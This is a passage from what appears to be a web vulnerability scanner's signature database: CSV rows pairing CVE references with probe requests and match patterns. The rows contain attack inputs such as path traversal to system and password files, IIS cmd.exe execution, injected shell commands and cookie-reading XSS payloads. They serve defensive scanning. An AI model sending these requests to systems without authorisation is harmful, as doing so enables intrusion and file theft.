overflow.\",\"\",\"\"\n\"003212\",\"OSVDB-4927\",\"7\",\"/.%252e/.%252e/.%252e/Windows/win.ini\",\"GET\",\"@LFI()\",\"JWalk Web server allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"003213\",\"OSVDB-4928\",\"3\",\"/add.php\",\"GET\",\"BODY:Failed opening '\",\"Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages.\",\"\",\"\"\n\"003214\",\"CVE-2001-1044\",\"3\",\"/class/mysql.class\",\"GET\",\"BODY:This program is free software\",\"Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials.\",\"\",\"\"\n\"003215\",\"CVE-2001-1044\",\"3\",\"/inc/sendmail.inc\",\"GET\",\"BODY:This program is free software\",\"Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials.\",\"\",\"\"\n\"003216\",\"CVE-2003-1405\",\"8\",\"/admin/system.php3?cmd=cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003217\",\"CVE-2003-1405\",\"8\",\"/admin/system.php3?cmd=dir%20c:\\\\\",\"GET\",\"BODY:boot\\.ini\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003218\",\"CVE-2003-1405\",\"8\",\"/admin/exec.php3?cmd=cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003219\",\"CVE-2003-1405\",\"8\",\"/admin/exec.php3?cmd=dir%20c:\\\\\",\"GET\",\"BODY:boot\\.ini\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003220\",\"OSVDB-5091\",\"3\",\"/foo.php3\",\"GET\",\"BODY:PHP Version\",\"DotBr 0.1 has a phpinfo() script called foo.php3.\",\"\",\"\"\n\"003221\",\"OSVDB-5092\",\"3\",\"/config.inc\",\"GET\",\"CODE:200\",\"DotBr 0.1 configuration file includes usernames and passwords.\",\"\",\"\"\n\"003222\",\"CVE-2003-1284\",\"3\",\"@CGIDIRSenviron.pl\",\"GET\",\"BODY:REMOTE_ADDR\",\"Sambar Server default script reveals environment information\",\"\",\"\"\n\"003223\",\"CVE-2003-1284\",\"3\",\"@CGIDIRStestcgi.exe\",\"GET\",\"BODY:REMOTE_ADDR\",\"Sambar Server default script reveals environment information\",\"\",\"\"\n\"003224\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"3\",\"/sysuser/docmgr/ieedit.stm?url=../\",\"GET\",\"CODE:200\",\"Sambar default file may allow directory listings.\",\"\",\"\"\n\"003225\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"3\",\"/sysuser/docmgr/iecreate.stm?template=../\",\"GET\",\"CODE:200\",\"Sambar default file may allow directory listings.\",\"\",\"\"\n\"003226\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003227\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003228\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003229\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003230\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003231\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003232\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003233\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003234\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003235\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003236\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003237\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003238\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003239\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003240\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003241\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003242\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003243\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003244\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003245\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003246\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003247\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003248\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003249\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003250\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003251\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003252\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003253\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003254\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003255\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>&bar=456\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003256\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003257\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003258\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003259\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003260\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/netutils/findata.stm?host=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003261\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/netutils/findata.stm?user=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003262\",\"https://seclists.org/fulldisclosure/2003/Mar/265\",\"4\",\"/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003263\",\"CVE-2001-0302\",\"8\",\"/isapi/tstisapi.dll\",\"GET\",\"BODY:Pi3web\",\"The test tstisapi.dll is available and can allow attackers to execute commands remotely.\",\"\",\"\"\n\"003264\",\"CVE-2001-0320,CVE-2001-0001\",\"7\",\"@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"@LFI()\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320\",\"\",\"\"\n\"003265\",\"CVE-2001-0320,CVE-2001-0001\",\"7\",\"@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"@LFI()\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320\",\"\",\"\"\n\"003266\",\"CVE-2002-0323\",\"7\",\"/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf\",\"GET\",\"BODY:SET CLIENT FILE\",\"Default scripts can allow arbitrary access to the host.\",\"\",\"\"\n\"003267\",\"CVE‑2001‑1580\",\"7\",\"/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf\",\"GET\",\"BODY:Source for file\",\"Novell web server allows any file on the system to viewed through the viewcode.jsp file\",\"\",\"\"\n\"003268\",\"CVE-2001-0466\",\"7\",\"@CGIDIRSustorekeeper.pl?command=goto&file=@LFI()\",\"GET\",\"@LFI()\",\"ustorekeeper will display arbitrary files.\",\"\",\"\"\n\"003270\",\"CVE-2001-0432\",\"d\",\"/catinfo\",\"GET\",\"CODE:200\",\"May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.\",\"\",\"\"\n\"003271\",\"CVE-2001-1371\",\"a\",\"/soap/servlet/soaprouter\",\"GET\",\"BODY:soapenv:Envelope\",\"Oracle 9iAS SOAP router could allow anonymous users to deploy applications.\",\"\",\"\"\n\"003272\",\"CVE-2001-0321\",\"7\",\"/opendir.php?@LFI(abs)\",\"GET\",\"@LFI()\",\"This PHP-Nuke CGI allows attackers to read any file on the web server.\",\"\",\"\"\n\"003273\",\"CVE-2001-0321\",\"7\",\"/opendir.php?requesturl=@LFI()\",\"GET\",\"@LFI()\",\"This PHP-Nuke CGI allows attackers to read any file on the web server.\",\"\",\"\"\n\"003274\",\"CVE-2003-0154\",\"4\",\"/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003275\",\"CVE-2003-0154\",\"4\",\"@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003276\",\"CVE-2003-0154\",\"4\",\"/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003277\",\"CVE-2003-0154\",\"4\",\"/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003278\",\"CVE-2003-0154\",\"4\",\"@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003279\",\"CVE-2003-0154\",\"4\",\"@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003280\",\"CVE-2003-0153\",\"4\",\"/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003281\",\"CVE-2003-0153\",\"4\",\"/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003282\",\"CVE-2003-0153\",\"4\",\"@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003283\",\"CVE-2003-0153\",\"4\",\"@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003284\",\"CVE-2003-0154\",\"4\",\"/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003285\",\"CVE-2003-0154\",\"4\",\"@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003286\",\"CVE-2003-0154\",\"4\",\"/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003287\",\"CVE-2003-0154\",\"4\",\"@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Bonsai is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003288\",\"CVE-2002-1453\",\"4\",\"/@JUNK(223)<font%20size=50>DEFACED<!--//--\",\"GET\",\"BODY:<font size=50>DEFACED<&&!BODY:not found\",\"MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.\",\"\",\"\"\n\"003289\",\"CVE-2002-1452\",\"d\",\"/MWS/HandleSearch.html?searchTarget=test&B1=Submit\",\"GET\",\"CODE:200\",\"MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.\",\"\",\"\"\n\"003290\",\"CVE-2001-0561\",\"7\",\"@CGIDIRSa1disp3.cgi?@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"003291\",\"CVE-2001-0561\",\"7\",\"@CGIDIRSa1stats/a1disp3.cgi?@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"003292\",\"CVE-2001-0561\",\"7\",\"@CGIDIRSa1stats/a1disp3.cgi?@LFI()\",\"GET\",\"@LFI()\",\"Remote file retrieval.\",\"\",\"\"\n\"003293\",\"CVE-2001-0561\",\"7\",\"@CGIDIRSa1stats/a1disp4.cgi?@LFI()\",\"GET\",\"@LFI()\",\"Remote file retrieval.\",\"\",\"\"\n\"003294\",\"CVE-2001-0333\",\"8\",\"/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003295\",\"CVE-2001-0333\",\"8\",\"/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003296\",\"CVE-2001-0333\",\"8\",\"/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003297\",\"CVE-2001-0333\",\"8\",\"/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003298\",\"CVE-2001-0333\",\"8\",\"/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003299\",\"CVE-2001-0333\",\"8\",\"/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003300\",\"CVE-2001-0333\",\"8\",\"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003301\",\"CVE-2001-0333\",\"8\",\"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver\",\"GET\",\"BODY:\\[Version\\]\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003302\",\"CVE-2001-0333\",\"8\",\"/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.\",\"\",\"\"\n\"003303\",\"https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-info-detected/\",\"3\",\"/server-info\",\"GET\",\"CODE:200&&BODY:Server Information\",\"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.\",\"\",\"\"\n\"003304\",\"CVE-2001-1350\",\"4\",\"@CGIDIRSnamazu.cgi\",\"GET\",\"CODE:200\",\"Namazu search engine found. Vulnerable to XSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26).\",\"\",\"\"\n\"003306\",\"\",\"3\",\"/.nsconfig\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"003307\",\"\",\"3\",\"@CGIDIRS.nsconfig\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"003308\",\"CVE-2001-0731\",\"2\",\"/?D=A\",\"GET\",\"BODY:(?i)index of \\/\",\"Apache allows directory listings by requesting.\",\"\",\"\"\n\"003309\",\"CVE-2001-0731\",\"2\",\"/?N=D\",\"GET\",\"BODY:(?i)index of \\/\",\"Apache allows directory listings by requesting.\",\"\",\"\"\n\"003310\",\"CVE-2001-0731\",\"2\",\"/?S=A\",\"GET\",\"BODY:(?i)index of \\/\",\"Apache allows directory listings by requesting.\",\"\",\"\"\n\"003311\",\"CVE-2001-0731\",\"23\",\"/?M=A\",\"GET\",\"BODY:(?i)index of \\/\",\"Apache allows directory listings. Upgrade Apache or disable directory indexing.\",\"\",\"\"\n\"003312\",\"CVE-2001-1586\",\"7\",\"/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1\",\"GET\",\"BODY:Reply from 127\\.0\\.0\\.1\",\"AnalogX SimpleServer:WWW HTTP vulnerability allows specially formatted strings to perform command execution. Upgrade to version 1.15 or higher.\",\"\",\"\"\n\"003313\",\"CVE-2001-1586\",\"7\",\"/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1\",\"GET\",\"CODE:200\",\"AnalogX SimpleServer:WWW HTTP vulnerability allows specially formatted strings to perform command execution. Upgrade to version 1.15 or higher.\",\"\",\"\"\n\"003314\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/dc/auth_data/auth_user_file.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"003315\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/dc/orders/orders.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"003318\",\"CVE-2001-0985\",\"8\",\"@CGIDIRSshop.pl/page=;cat%20shop.pl|\",\"GET\",\"BODY:\\\\\\/perl\",\"Shopping Cart (Hassan) allows execution of remote commands.\",\"\",\"\"\n\"003319\",\"CVE-2001-1019\",\"7\",\"@CGIDIRSview_item?HTML_FILE=@LFI()%00\",\"GET\",\"@LFI()\",\"sglMerchant allows reading of remote files.\",\"\",\"\"\n\"003320\",\"CVE-2001-1446\",\"3\",\"/.FBCIndex\",\"GET\",\"BODY:Bud2\",\"This file on OSX contains the source of the files in the directory.\",\"\",\"\"\n\"003321\",\"CVE-2001-0992\",\"7\",\"@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20@LFI(abs)|\",\"GET\",\"@LFI()\",\"ShopPlus Cart allows arbitrary command execution.\",\"\",\"\"\n\"003322\",\"CVE-2001-1014\",\"8\",\"@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|\",\"GET\",\"BODY:\\\\\\/perl\",\"This CGI allows attackers to execute commands on the remote server.\",\"\",\"\"\n\"003323\",\"CVE-2002-1453\",\"4\",\"/@JUNK(223)<font%20size=50><script>alert(11)</script><!--//--\",\"GET\",\"BODY:<script>alert\\(11\\)<\\/script>\",\"MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003324\",\"CVE-2002-1559\",\"7\",\"@CGIDIRSion-p.exe?page=c:\\winnt\\repair\\sam\",\"GET\",\"CODE:200\",\"Ion-P allows remote file retrieval.\",\"\",\"\"\n\"003325\",\"CVE-2002-1559\",\"7\",\"@CGIDIRSion-p?page=@LFI()\",\"GET\",\"@LFI()\",\"Ion-P allows remote file 